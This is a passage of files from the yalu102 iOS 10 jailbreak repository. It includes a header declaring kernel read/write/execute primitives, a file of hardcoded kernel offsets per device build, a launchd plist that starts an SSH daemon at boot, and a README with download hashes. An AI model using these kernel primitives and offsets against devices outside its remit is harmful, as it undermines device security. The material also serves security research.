7 | // 8 | 9 | #ifndef unjail_h 10 | #define unjail_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | extern mach_port_t tfp0; 25 | extern uint64_t kaslr_shift; 26 | extern uint64_t kernel_base; 27 | 28 | size_t kread(uint64_t where, void *p, size_t size); 29 | uint64_t kread_uint64(uint64_t where); 30 | uint32_t kread_uint32(uint64_t where); 31 | size_t kwrite(uint64_t where, const void *p, size_t size); 32 | size_t kwrite_uint64(uint64_t where, uint64_t value); 33 | size_t kwrite_uint32(uint64_t where, uint32_t value); 34 | 35 | void kx2(uint64_t fptr, uint64_t arg1, uint64_t arg2); 36 | uint32_t kx5(uint64_t fptr, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t arg4, uint64_t arg5); 37 | 38 | #endif /* unjail_h */ 39 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | This is not a support forum or generic mailing list. 2 | 3 | This form is exclusively for reporting issues caused directly by the inner workings of yalu. 4 | 5 | Direct your jailbreaking questions to one of these fine communities: 6 | 7 | * https://reddit.com/r/jailbreak 8 | * http://www.jailbreakqa.com/ 9 | 10 | Issues, which are not related to yalu's code, may be closed without comment. Do NOT post about: Cydia, tweak, respring/bootloop or app issues UNLESS you have evidence that they are caused by an error in the jailbreaking software itself. 
11 | 12 | (Delete this bit after reading, and replace it by "I read the issue posting guidelines.") 13 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 | !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | 26 | .DS_Store 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/LICENSE: -------------------------------------------------------------------------------- 1 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 2 | Version 2, December 2004 3 | 4 | Copyright (C) 2004 Sam Hocevar 5 | 6 | Everyone is permitted to copy and distribute verbatim or modified 7 | copies of this license document, and changing it is allowed as long 8 | as the name is changed. 9 | 10 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 11 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 12 | 13 | 0. You just DO WHAT THE FUCK YOU WANT TO. 14 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/README.md: -------------------------------------------------------------------------------- 1 | # yalu102 2 | 3 | ![Yalu logo](https://github.com/kpwn/yalu102/blob/master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png?raw=true) 4 | 5 | A "work in progress" iOS jailbreak for 64-bit devices created by [qwertyoruiopz](https://twitter.com/qwertyoruiopz) and [marcograssi](marcograss). 
6 | 7 | Please use the "Issues" tab for **code related** issues only. If you need support please search on [/r/jailbreak](https://reddit.com/r/jailbreak) before posting a question there. 8 | 9 | ## Supported Devices and iOS versions 10 | 11 | | Device | Version | 12 | |---------|----------| 13 | | iPad Pro | iOS 10.0.0 -> iOS 10.2 | 14 | | iPhone 6S | iOS 10.0.0 -> iOS 10.2 | 15 | | iPhone SE | iOS 10.0.0 -> iOS 10.2 | 16 | | iPhone 5S | iOS 10.0.0 -> iOS 10.2 | 17 | | iPad Air| iOS 10.0.0 -> iOS 10.2 | 18 | | iPad Mini 2| iOS 10.0.0 -> iOS 10.2 | 19 | | iPhone 6 | iOS 10.0.0 -> iOS 10.2 | 20 | | iPad Mini 3| iOS 10.0.0 -> iOS 10.2 | 21 | | iPad Air 2| iOS 10.0.0 -> iOS 10.2 | 22 | | iPad Mini 4 | iOS 10.0.0 -> iOS 10.2 | 23 | | iPod touch (6G) | iOS 10.0.0 -> iOS 10.2 | 24 | 25 | ### Planned Support: 26 | 27 | In the near future, the jailbreak will support the following devices: 28 | 29 | | Device | Version | 30 | |---------|----------| 31 | | iPhone 7 | iOS 10.0.0 -> iOS 10.1.1 | 32 | 33 | **Note, the iPhone 7 is only supported till iOS 10.1.1** 34 | If you are already on iOS 10.2 with an iPhone 7, **stay there**. The actual exploit behind this still works, but the KPP bypass does not. 35 | 36 | ## Compiling: 37 | 38 | 1. `git clone` the repo. 39 | 2. Open the repo in Xcode 40 | 3. Change the bundle ID, as shown [here](https://www.reddit.com/r/sideloaded/wiki/how-to-sideload#wiki_changing_the_bundle_identifier_and_team) 41 | 4. Include the IOKit headers, and add them to your search path. 42 | 5. Run the project. 43 | 44 | ## Warnings 45 | 46 | This jailbreak is a work in progress. Some things do not work, but most things do. 47 | 48 | Do not install things that are untested. 49 | 50 | **AppSync and other unsupported and untested software will probably throw your device into a bootloop or do other bad things.** Do not open an issue complaining that your device has been bootlooped because you installed other software. You have been warned. 
51 | 52 | ## Installing 53 | 54 | > DO NOT DOWNLOAD THIS SOFTWARE FROM ANY SOURCE OTHER THAN THESE LINKS UNDER ANY CIRCUMSTANCE. IT IS VERY EASY TO BACKDOOR THIS SORT OF SOFTWARE TO CONTAIN MALWARE. PLEASE BE EXTREMELY CAREFUL. THESE MIRRORS ARE TRUSTED, BUT STILL CHECK THE SHA1. 55 | 56 | * Download the pre-compiled version from the table below. 57 | * [Check the SHA1 hash](http://onlinemd5.com) of the downloaded file against the value in the table below (optional but recommended; computing it locally with `shasum` is preferable to uploading the file to a third-party site). 58 | * Install using [Cydia Impactor](http://www.cydiaimpactor.com/). 59 | * Open the application and follow the instructions. 60 | 61 | 62 | | Version | Download | SHA1 | 63 | |---------|----------|------| 64 | | Beta 7 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta7.ipa) | 4afa99d4b568aa8cbb9ac61fddd584111fed79c5 | 65 | | Beta 6 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta6.ipa) | 0130ebe60c97e2013a4b849b7d9bc321d749f304 | 66 | | Beta 5 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta5.ipa) | f8eb6cd37054a9d25b818e3bddd13bfedbf72df1 | 67 | | Beta 4 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta4.ipa) | f8270e59d7d7267613ffa63217b91fea425eec36 | 68 | | Beta 3 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta3.ipa) | b2e0bdd31566f876d67cba036b5d29aef7ff257d | 69 | | Beta 2 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta.ipa) | 4fddad7cca8aa0c0a6579c1d63d00917f15efc86 | 70 | | Beta 1 | [Link](https://yalu.qwertyoruiop.com/yalu102_alpha.ipa) | 2fe14f1c1e1a0d26203bbb123f6747a978dd2b4f | 71 | 72 | ## Contributing 73 | 74 | Create a fork of the repository, make your changes and then create a pull request. 75 | Please check whether an equivalent pull request already exists before creating a new one. Note, any pull requests adding IOKit headers will be closed. 
Please respect copyright laws, and do not distribute / download IOKit headers from unofficial sources: they are bundled legally with macOS SDK 76 | 77 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 
20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 
48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png -------------------------------------------------------------------------------- 
/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom" : "iphone", 6 | "filename" : "AppIcon40x40~ipad-2.png", 7 | "scale" : "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom" : "iphone", 12 | "filename" : "AppIcon60x60.png", 13 | "scale" : "3x" 14 | }, 15 | { 16 | "size" : "29x29", 17 | "idiom" : "iphone", 18 | "filename" : "AppIcon40x40@2x~ipadsptl.png", 19 | "scale" : "2x" 20 | }, 21 | { 22 | "size" : "29x29", 23 | "idiom" : "iphone", 24 | "filename" : "AppIcon40x40@2x~ipadsptl3.png", 25 | "scale" : "3x" 26 | }, 27 | { 28 | "size" : "40x40", 29 | "idiom" : "iphone", 30 | "filename" : "AppIcon40x40@2x~ipad-1.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "40x40", 35 | "idiom" : "iphone", 36 | "filename" : "AppIcon40x40@3x~iphone.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "AppIcon60x60@2x.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "60x60", 47 | "idiom" : "iphone", 48 | "filename" : "AppIcon60x60@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "20x20", 53 | "idiom" : "ipad", 54 | "filename" : "AppIcon40x40@2x~ipadnotif.png", 55 | "scale" : "1x" 56 | }, 57 | { 58 | "size" : "20x20", 59 | "idiom" : "ipad", 60 | "filename" : "AppIcon40x40~ipad-1.png", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "AppIcon40x40@2x~ipadsptlsmal.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "AppIcon40x40@2x~ipadsptl-1.png", 73 | 
"scale" : "2x" 74 | }, 75 | { 76 | "size" : "40x40", 77 | "idiom" : "ipad", 78 | "filename" : "AppIcon40x40~ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "AppIcon40x40@2x~ipad.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "AppIcon60x60~ipad.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "AppIcon60x60@2x~ipad.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "AppIcon60x60@2x~ipadpro.png", 103 | "scale" : "2x" 104 | } 105 | ], 106 | "info" : { 107 | "version" : 1, 108 | "author" : "xcode" 109 | } 110 | } -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 33 | 39 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | 
CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 
7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | { 13 | IBOutlet UIButton* dope; 14 | } 15 | - (IBAction)yolo:(id)sender; 16 | 17 | @end 18 | 19 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/bootstrap.tar -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/devicesupport.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "devicesupport.h" 3 | #import 4 | #import 5 | 6 | 7 | NSMutableArray* consttable = nil; 8 | NSMutableArray* collide = nil; 9 | int constload() { 10 | struct utsname uts; 11 | uname(&uts); 12 | if (strstr(uts.version, "Marijuan")) { 13 | return -2; 14 | } 15 | 16 | NSString* strv = [NSString stringWithUTF8String:uts.version]; 17 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 18 | int m = 0; 19 | collide = [NSMutableArray new]; 20 | 21 | for (NSDictionary* dict in dp) { 22 | if ([dict[@"vers"] isEqualToString:strv]) { 23 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 24 | int i = 0; 25 | for (NSString* str in dict[@"val"]) { 26 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 27 | i++; 28 | } 29 | m++; 30 | } 31 | } 32 | if (m) { 33 | return 0; 34 | } 35 | return -1; 36 | } 37 | char affine_const_by_surfacevt(uint64_t surfacevt_slid) 38 | { 39 | for (NSArray* arr in collide) { 40 | if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 41 | NSLog(@"affined"); 42 | consttable = arr; 43 | 
return 0; 44 | } 45 | } 46 | return -1; 47 | } 48 | uint64_t constget(int idx){ 49 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 50 | } 51 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/dropbear.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | ShaiHulud 7 | Program 8 | /usr/local/bin/dropbear 9 | ProgramArguments 10 | 11 | /usr/local/bin/dropbear 12 | -F 13 | -R 14 | -p 15 | 127.0.0.1:22 16 | 17 | RunAtLoad 18 | 19 | KeepAlive 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/iokitmig64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/iokitmig64.o -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/launchctl -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 
7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/offsets.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "offsets.h" 7 | 8 | uint64_t allproc_offset; 9 | uint64_t kernproc_offset; 10 | uint64_t procoff; 11 | uint64_t rootvnode_offset; 12 | 13 | void init_offsets() { 14 | struct utsname u = { 0 }; 15 | uname(&u); 16 | 17 | printf("sysname: %s\n", u.sysname); 18 | printf("nodename: %s\n", u.nodename); 19 | printf("release: %s\n", u.release); 20 | printf("version: %s\n", u.version); 21 | printf("machine: %s\n", u.machine); 22 | 23 | allproc_offset = 0x5a4148; 24 | procoff = 0x360; 25 | rootvnode_offset = 0x5aa0b8; 26 | 27 | /* 28 | Offsets shared by: 29 | - @qwertyoruiop 30 | - @Mila432 31 | - @Andywiik 32 | - @nicogibbons 33 | - @jtv7 34 | - @onchehuh 35 | */ 36 | 37 | if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) { 38 | allproc_offset = 0x5b8528; 39 | rootvnode_offset = 0x5be0b8; 40 | } 41 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) { 42 | allproc_offset = 0x5b8468; 43 | rootvnode_offset = 0x5be0b8; 44 | } 45 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) { 46 | allproc_offset = 0x5a8438; 47 | rootvnode_offset = 0x5ae0b8; 48 | } 49 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) { 50 | allproc_offset = 
0x5ac418; 51 | rootvnode_offset = 0x5b20b8; 52 | } 53 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) { 54 | allproc_offset = 0x5ec478; 55 | rootvnode_offset = 0x5f20b8; 56 | } 57 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000") == 0) { 58 | allproc_offset = 0x5b8468; 59 | rootvnode_offset = 0x5be0b8; 60 | }//apple tv 4 61 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000") == 0) { 62 | allproc_offset = 0x5b8468; 63 | rootvnode_offset = 0x5be0b8; 64 | }//apple tv 4 65 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000") == 0) { 66 | allproc_offset = 0x5b4168; 67 | rootvnode_offset = 0x5ba0b8; 68 | }//apple tv 4 69 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) { 70 | allproc_offset = 0x5ec178; 71 | rootvnode_offset = 0x5f20b8; 72 | } 73 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) { 74 | allproc_offset = 0x5b4228; 75 | rootvnode_offset = 0x5ba0b8; 76 | } 77 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) { 78 | allproc_offset = 0x5b4168; 79 | rootvnode_offset = 0x5ba0b8; 80 | } 81 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { 82 | allproc_offset = 0x5a4148; 83 